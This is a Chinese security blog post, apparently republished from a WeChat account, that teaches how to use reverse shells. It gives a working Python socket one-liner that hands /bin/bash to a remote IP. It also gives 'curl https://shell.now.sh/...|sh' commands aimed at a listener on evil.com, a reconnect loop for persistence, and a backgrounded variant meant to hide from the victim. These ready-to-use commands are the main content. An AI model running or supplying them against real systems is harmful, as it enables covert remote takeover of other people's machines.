专栏首页小白帽学习之路python与安全(四)shell反弹

python与安全(四)shell反弹

此文章为原创连载文章,关注公众号,持续更新。

欢迎投稿及转载,标明来源作者即可。

原理:

又到了小生归一 的笔记分享~有人期待嘛~

反弹shell,就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。

反弹shell通常被用于因防火墙、权限不足、端口占用等情况下。

1.目标主机在内网,无法直接连接

2.目标主机IP动态改变

3.由于防火墙等的限制,只能目标主机发送请求,不能接收请求

4.目标是获取目标主机的shell

我们常用socket模块进行反弹shell.

常用姿势:

python -c 'import 
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.3.251",8080));os.dup2(s.fileno(),0); 
os.dup2(s.fileno(),1); 
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

在网上我们也可以找到反弹shell姿势,所以我就不在多写了。

有的SSTI中的姿势也可以借鉴过来.

工具

1.姿势查找

这是p神在星球分享的工具,有各种环境的姿势,非常全面。

工具地址:https://krober.biz/misc/reverse_shell.php?ip=3.11.178.242&port=443

2.reverse-shell

(1)监听连接

在您的机器上,打开一个端口并进行监听。您可以使用netcat轻松完成此操作。

nc-l 1337

(2)在目标上执行反向Shell

在目标计算机上,将https://shell.now.sh/yourip:port的输出通过管道传递到sh。

curlhttps://shell.now.sh/192.168.0.69:1337 |sh

回到您的机器,您现在应该有一个shell提示。

(3)您可以使用主机名代替IP。

curlhttps://shell.now.sh/localhost:1337 |sh

(4)远程连接

因为这是反向连接,所以它可以穿透防火墙并连接到Internet。您可以在evil.com上的服务器上侦听连接,并从安全网络内部获得反向外壳。

curlhttps://shell.now.sh/evil.com:1337 |sh

(5)持续连接

默认情况下,当外壳退出时,您将失去连接。您可能会通过无效命令意外地执行此操作。您可以通过将其包装在while循环中来轻松创建将尝试重新连接的shell。

whiletrue;docurl https://shell.now.sh/yourip:1337 |sh;done

(6)作为后台进程运行

终端会话需要保持打开状态以保持反向外壳连接。

以下命令将在后台进程中运行反向外壳程序并退出终端,在受害者的计算机上没有打开看起来可疑的终端窗口。

确保在新的终端窗口中运行此命令,否则将丢失现有会话中的任何工作。

sh-c "curlhttps://shell.now.sh/localhost:1337 | sh -i &"&&exit

工具地址:https://github.com/lukechilds/reverse-shell

本文分享自微信公众号 - 程序员阿甘(gh_a2e36d69d566),作者:小生归一

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-04-16

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • Kali Linux Web渗透测试手册(第二版) - 7.2 - 通过利用Shellshock执行命令

    Shellshock(也叫Bashdoor)是2014年9月在bash shell中发现的一个bug,它允许通过存储在环境变量值中的函数执行命令。

    7089bAt@PowerLi
  • C和C++哪个效率更高?

    前几天发了一篇推送涉及c和c++,评论区大家对c和c++哪个效率更高这个问题比较感兴趣,今天小编就和大家一起讨论一下这个问题!

    7089bAt@PowerLi
  • 安全服务之安全基线及加固(一)Windows篇

    安全服务工程师大家应该都知道,对于他的岗位职责你可能会说不就是渗透测试啊、应急响应嘛.....实际上正式一点的企业对于安服的要求是包括了漏洞扫描、安全基线检查、...

    7089bAt@PowerLi
  • bash运行脚本的几种方式 转

    bash shell 脚本执行的方法有多种,本文作一个总结,供大家学习参考。 假设我们编写好的shell脚本的文件名为hello.sh,文件位置在/data/...

    wuweixiang
  • 小白Linux入门--入门篇(二):Linux下的shell编程入门

    我们在Linux下编程,不可避免的会用到shell编程,编写一些简单的shell脚本可以实现很多使用的功能,比如我们微信公众号需要用到的开机tomcat和n...

    浩Coding
  • LeetCode 1033. 移动石子直到连续

    每一回合,我们假设这三枚石子当前分别位于位置 x, y, z 且 x < y < z。 从位置 x 或者是位置 z 拿起一枚石子,并将该石子移动到某一整数位置...

    Michael阿明
  • 1-6 求链式线性表的倒数第K项 (20 分)

    版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 ...

    韩旭051
  • 数据结构与算法-

    因为很大的数已经超过了计算机可以存储,虽然 Python3 中的整型是没有限制内存大小的,但是不代表其他语言没有内存限制,所以一般将两个整数直接相加并不现实

    机器视觉CV
  • Java每日一练(2017/8/12)

    最新通知 ●回复"每日一练"获取以前的题目! ●【新】Android视频更新了!(回复【安卓视频】获取下载链接) ●【新】Ajax知识点视频更新了!(回复【学习...

    Java学习
  • 谈谈删库跑路这点儿事

    很震惊!很震撼!吓得我赶紧召集全公司服务端小伙伴Review了我们所有的安全部署!!!

    iTesting

扫码关注云+社区

领取腾讯云代金券